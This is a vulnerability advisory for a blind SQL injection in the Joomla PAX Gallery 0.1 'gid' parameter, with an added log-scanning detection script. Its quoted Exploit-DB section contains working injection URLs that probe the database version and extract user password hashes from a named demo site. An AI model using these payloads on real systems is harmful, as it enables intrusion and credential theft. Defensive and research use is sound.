Vendor: Pax Gallery
By: XaDoS (SecurityCode Team)
CVSS: 7.5 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: Pax Gallery
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:pax_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability

The 'gid' parameter of Joomla Component PAX Gallery v 0.1 is vulnerable to blind SQL injection: an attacker can inject arbitrary SQL code through it and so manipulate the queries the component runs. The vulnerability is only exploitable when 'safe mode' is set to 'ON'.

Mitigation:

Ensure that the 'safe mode' is set to 'OFF' and update to the latest version of Joomla Component PAX Gallery.
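A detection check for requests of the kind this advisory describes, as an added example that is not part of the original advisory: it flags any `com_paxgallery` request whose `gid` is not a plain integer. The function names and the log lines are constructed for illustration, and the assumption that a legitimate `gid` is always a non-negative integer is ours.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate gallery id is a plain non-negative integer.
INT_RE = re.compile(r"\d+")


def suspicious_gid(target):
    """Return the decoded gid if a com_paxgallery request carries a
    non-integer gid, otherwise None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_paxgallery" not in query.get("option", []):
        return None
    for gid in query.get("gid", []):
        # parse_qs has already percent-decoded the value and turned '+' into ' '
        if not INT_RE.fullmatch(gid.strip()):
            return gid
    return None


def scan(log_lines):
    """Yield (client_ip, decoded_gid) for each log line worth reviewing."""
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        gid = suspicious_gid(m.group(1))
        if gid is not None:
            yield line.split(" ", 1)[0], gid


# Constructed sample log lines (documentation IP ranges, no real host).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Dec/2008:10:00:01 +0000] "GET /index.php?option=com_paxgallery&task=table&gid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Dec/2008:10:00:05 +0000] "GET /index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Dec/2008:10:00:06 +0000] "GET /index.php?option=com_paxgallery&task=table&gid=1+AND+1=2 HTTP/1.1" 200 812',
    '198.51.100.7 - - [28/Dec/2008:10:00:09 +0000] "GET /index.php?option=com_content&gid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, gid in scan(SAMPLE_LOG):
        print(f"{ip} non-integer gid: {gid!r}")
```

Repeated hits from one client with differing response sizes, as in the two flagged sample lines, are the pattern a boolean-based blind probe leaves behind.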

Exploit-DB raw data:

[■]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
 

[■] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL] 


[■] D£M0: 

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5  [Ye$]
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
 
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
 
d8e423..ecc... ;-)
 
[■] Th4nKs::
 
> Str0ke </ > Securitycode Team </ > StaKer </

# milw0rm.com [2008-12-28]